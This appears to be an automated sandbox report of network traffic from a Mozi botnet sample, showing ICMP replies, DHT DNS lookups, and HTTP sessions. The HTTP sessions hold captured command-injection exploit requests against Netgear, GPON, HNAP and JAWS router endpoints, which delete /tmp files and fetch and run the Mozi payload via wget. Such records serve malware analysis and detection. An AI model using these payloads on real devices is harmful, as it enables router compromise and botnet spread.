                                                                                                          Jan 6, 2021 19:32:53.317796946 CET104.254.118.171192.168.2.20ac60(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:53.436681032 CET201.20.104.206192.168.2.20d564(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:32:54.482261896 CET58.160.251.5192.168.2.204067(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:55.218954086 CET185.43.204.129192.168.2.2071d4(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:55.323322058 CET89.161.78.241192.168.2.20687c(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:32:55.323348045 CET89.161.78.241192.168.2.20687c(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:09.249130964 CET90.161.157.169192.168.2.207249(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:10.229506969 CET83.230.38.193192.168.2.201aa0(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:33:17.207418919 CET94.216.150.65192.168.2.20298c(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:21.183895111 CET149.11.89.129192.168.2.2053f0(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:21.210881948 CET31.7.246.208192.168.2.20d195(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:33:28.352058887 CET122.177.154.2192.168.2.20d49b(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:28.495599985 CET203.174.176.154192.168.2.2032e0(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:33:29.208363056 CET81.228.87.91192.168.2.2078b8(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:29.334743023 CET71.156.195.71192.168.2.2072fa(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:31.379767895 CET50.64.77.202192.168.2.203ff2(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:35.320141077 CET156.110.214.142192.168.2.20e9ea(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:33:35.369901896 CET189.150.157.109192.168.2.201aec(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:36.334845066 CET68.87.195.114192.168.2.20407a(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:36.382658958 CET77.123.130.180192.168.2.209010(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:39.466825962 CET100.72.254.54192.168.2.204f1d(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:39.466890097 CET100.72.254.54192.168.2.204f1d(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:39.466917992 CET100.72.254.54192.168.2.204f1d(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:40.212073088 CET87.78.52.239192.168.2.20a91b(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:43.281371117 CET173.212.127.65192.168.2.20984b(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:43.318502903 CET202.88.190.46192.168.2.203e23(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:43.458074093 CET187.100.175.89192.168.2.20ea5b(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:33:45.212599993 CET79.247.172.145192.168.2.2027fe(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:49.207262993 CET81.228.84.167192.168.2.20d02e(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:52.196225882 CET78.34.32.117192.168.2.206b25(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:52.450401068 CET123.248.103.138192.168.2.20a36a(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:55.307929039 CET64.59.180.82192.168.2.2053f0(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:56.221833944 CET87.110.131.81192.168.2.209aa7(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:33:56.319020033 CET162.0.253.113192.168.2.20417c(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:33:57.178483009 CET79.212.28.148192.168.2.2040d5(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:00.365307093 CET64.59.134.226192.168.2.207206(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:03.219293118 CET31.178.122.47192.168.2.2059cb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:03.234790087 CET95.238.97.92192.168.2.20b28d(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:03.299431086 CET64.33.158.155192.168.2.209e9d(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:10.201447010 CET80.157.131.61192.168.2.201030(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:12.806750059 CET122.211.60.2192.168.2.2028ae(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:17.333463907 CET204.148.10.26192.168.2.20b9e8(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:17.818928957 CET103.5.76.133192.168.2.203b1b(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:20.197362900 CET84.142.196.62192.168.2.203d87(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:22.989078999 CET89.95.247.201192.168.2.20f580(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:23.407120943 CET152.231.102.126192.168.2.20bf4f(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:24.236579895 CET80.169.237.142192.168.2.20e8aa(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:24.253492117 CET178.11.2.209192.168.2.204fce(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:24.440325975 CET69.43.129.58192.168.2.208aa4(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:34:26.430133104 CET152.231.102.126192.168.2.20bf4f(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:27.387012959 CET41.79.224.42192.168.2.206a76(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:27.387042046 CET41.79.224.42192.168.2.206a76(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:27.453178883 CET112.190.139.126192.168.2.202362(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:27.453206062 CET112.190.139.126192.168.2.202362(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:29.316807032 CET24.164.239.119192.168.2.2091eb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:30.399749041 CET41.79.224.42192.168.2.206a76(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:30.459594965 CET112.190.139.126192.168.2.202362(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:31.222431898 CET91.97.32.88192.168.2.20a363(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:31.893105030 CET115.125.212.1192.168.2.20854(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:34.387840033 CET216.110.207.66192.168.2.203e61(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:34.474571943 CET115.112.142.90192.168.2.20b1b(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:34:35.220297098 CET213.249.105.38192.168.2.20b866(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:34:38.140837908 CET143.137.248.109192.168.2.20cf5d(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:34:38.216521025 CET95.33.139.238192.168.2.20c14b(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:38.349822044 CET88.64.229.37192.168.2.20a46c(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:38.442424059 CET154.218.71.141192.168.2.20a248(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:41.179557085 CET149.11.89.129192.168.2.20cdc8(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:45.206793070 CET94.220.250.219192.168.2.2033bb(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:45.211199999 CET37.138.45.246192.168.2.207ead(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:45.232125044 CET37.128.225.114192.168.2.2063f6(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:45.435605049 CET189.97.128.90192.168.2.20fda3(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:46.211292982 CET87.157.186.236192.168.2.208948(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:48.425474882 CET157.14.30.3192.168.2.206433(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:48.425487041 CET157.14.30.3192.168.2.206433(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:51.429507971 CET157.14.30.3192.168.2.206433(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:52.315855980 CET136.34.214.159192.168.2.201eaa(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:53.320285082 CET216.175.40.97192.168.2.20dbbb(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:34:53.390894890 CET100.100.104.30192.168.2.20c1ae(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:59.207247972 CET212.158.129.246192.168.2.20eee5(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:34:59.354629993 CET167.234.10.23192.168.2.207602(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:35:02.227792978 CET185.228.111.9192.168.2.20b571(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:02.227849960 CET185.228.111.9192.168.2.20b571(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:02.312655926 CET136.61.214.222192.168.2.201f04(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:02.360094070 CET100.98.0.6192.168.2.20fceb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:02.360158920 CET100.98.0.6192.168.2.20fceb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:03.242235899 CET88.113.226.3192.168.2.20fbe9(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:05.227871895 CET185.228.111.9192.168.2.20b571(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:05.360084057 CET100.98.0.6192.168.2.20fceb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:06.199481964 CET217.170.96.43192.168.2.20cc73(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:06.199521065 CET217.170.96.43192.168.2.20cc73(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:06.226272106 CET10.152.6.22192.168.2.203f8d(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:35:06.431147099 CET172.20.2.186192.168.2.202cb3(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:06.446826935 CET189.105.19.22192.168.2.209067(Port unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:07.302426100 CET142.243.250.26192.168.2.20bf6f(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:35:09.199500084 CET217.170.96.43192.168.2.20cc73(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:14.235080004 CET147.52.1.114192.168.2.2063db(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:16.405999899 CET112.189.140.46192.168.2.203fbd(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:17.377204895 CET176.236.110.96192.168.2.2075eb(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:19.338017941 CET173.219.221.213192.168.2.205aab(Host unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:22.455529928 CET149.11.89.129192.168.2.20e1c5(Net unreachable)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:23.237175941 CET79.214.251.101192.168.2.20a0ac(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:23.326273918 CET103.249.240.84192.168.2.20605b(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:35:27.219352961 CET87.142.100.71192.168.2.2031cf(Unknown)Destination Unreachable
                                                                                                          Jan 6, 2021 19:35:27.236010075 CET79.128.227.225192.168.2.20f1f9(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:35:27.373481035 CET160.119.142.3192.168.2.209ef4(Time to live exceeded in transit)Time Exceeded
                                                                                                          Jan 6, 2021 19:35:28.235371113 CET193.136.134.150192.168.2.20890f(Host unreachable)Destination Unreachable

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Jan 6, 2021 19:31:36.634013891 CET192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.685122013 CET192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.736896038 CET192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.785867929 CET192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Jan 6, 2021 19:31:36.682205915 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.682205915 CET8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.735800982 CET8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.784712076 CET8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.842376947 CET8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                          Jan 6, 2021 19:31:36.842376947 CET8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • 127.0.0.1:80
                                                                                                          • 71.41.225.74:80
                                                                                                          • 139.39.140.28:49152
                                                                                                          • 92.246.94.253:80
                                                                                                          • 81.6.188.111:80
                                                                                                          • 167.82.102.91:80
                                                                                                          • 139.162.182.70:80
                                                                                                          • 85.214.105.212:80
                                                                                                          • 127.0.0.1:7574
                                                                                                          • 23.210.67.167:80
                                                                                                          • 23.214.76.71:80
                                                                                                          • 103.47.16.235:80
                                                                                                          • 178.88.225.33:80
                                                                                                          • 127.0.0.1:8080
                                                                                                          • 13.249.130.85:80

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          0192.168.2.2039168212.12.160.5880
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:31:36.304547071 CET125OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:31:36.372790098 CET125INHTTP/1.1 302 Found
                                                                                                          Connection: close
                                                                                                          Pragma: no-cache
                                                                                                          cache-control: no-cache
                                                                                                          Location: /efYOQ/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          1192.168.2.2038282203.152.217.14480
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:31:44.555049896 CET185OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                          Host: 127.0.0.1:80
                                                                                                          Connection: keep-alive
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Accept: */*
                                                                                                          User-Agent: Hello, World
                                                                                                          Content-Length: 118
                                                                                                          Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                          Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                          Jan 6, 2021 19:31:44.908468962 CET186INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 7 Jan 2021 02:31:44
                                                                                                          Server: Virata-EmWeb/R6_0_1
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: text/html
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 30 30 30 30 30 33 33 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 48 4f 52 54 43 55 54 20 49 43 4f 4e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 0a 3c 74 69 74 6c 65 3e 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0a 0a 76 61 72 20 62 61 73 65 36 34 45 6e 63 6f 64 65 43 68 61 72 73 20 3d 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 22 3b 0a 76 61 72 20 62 61 73 65 36 34 44 65 63 6f 64 65 43 68 61 72 73 20 3d 20 6e 65 77 20 41 72 72 61 79 28 0a 20 20 20 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 0a 20 20 20 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 0a 20 20 20 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 36 32 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 36 33 2c 0a 20 20 20 20 35 32 2c 20 35 33 2c 20 35 34 2c 20 35 35 2c 20 35 36 2c 20 35 37 2c 20 35 38 2c 20 35 39 2c 20 36 30 2c 20 36 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 0a 20 20 20 20 2d 31 2c 20 20 30 2c 20 20 31 2c 20 20 32 2c 20 20 33 2c 20 20 34 2c 20 20 35 2c 20 20 36 2c 20 20 37 2c 20 20 38 2c 20 20 39 2c 20 31 30 2c 20 31 31 2c 20 31 32 2c 20 31 33 2c 20 31 34 2c 0a 20 20 20 20 31 35 2c 20 31 36 2c 20 31 37 2c 20 31 38 2c 20 31 39 2c 20 32 30 2c 20 32 31 2c 20 32 32 2c 20 32 33 2c 20 32 34 2c 20 32 35 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 20 2d 31 2c 0a 20 20 20 20 2d 31 2c 20 32 36 2c 20 32 37 2c 20 32 38 2c 20 32 39 2c 20 33 30 2c
                                                                                                          Data Ascii: 00000331<html><head><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Expires" content="-1"><meta http-equiv="Cache-Control" content="no-cache"><link rel="SHORTCUT ICON" href="/favicon.ico"><title>Login</title><script language="JavaScript">var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var base64DecodeChars = new Array( -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30,


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          10192.168.2.205393681.6.188.11180
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:04.326169968 CET698OUTPOST /HNAP1/ HTTP/1.0
                                                                                                          Host: 81.6.188.111:80
                                                                                                          Content-Type: text/xml; charset="utf-8"
                                                                                                          SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                          Jan 6, 2021 19:33:15.168520927 CET749INHTTP/1.1 400 Bad Request
                                                                                                          Date: Wed, 06 Jan 2021 18:33:04 GMT
                                                                                                          Server: Apache/2.4.6 (CentOS) PHP/7.3.18
                                                                                                          Content-Length: 226
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          11192.168.2.2041050167.82.102.9180
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:07.288767099 CET709OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                          User-Agent: Hello, world
                                                                                                          Host: 167.82.102.91:80
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                          Connection: keep-alive
                                                                                                          Jan 6, 2021 19:33:07.329030037 CET710INHTTP/1.1 500 Domain Not Found
                                                                                                          Server: Varnish
                                                                                                          Retry-After: 0
                                                                                                          content-type: text/html
                                                                                                          Cache-Control: private, no-cache
                                                                                                          connection: keep-alive
                                                                                                          X-Served-By: cache-hhn4051-HHN
                                                                                                          Content-Length: 246
                                                                                                          Accept-Ranges: bytes
                                                                                                          Date: Wed, 06 Jan 2021 18:33:07 GMT
                                                                                                          Via: 1.1 varnish
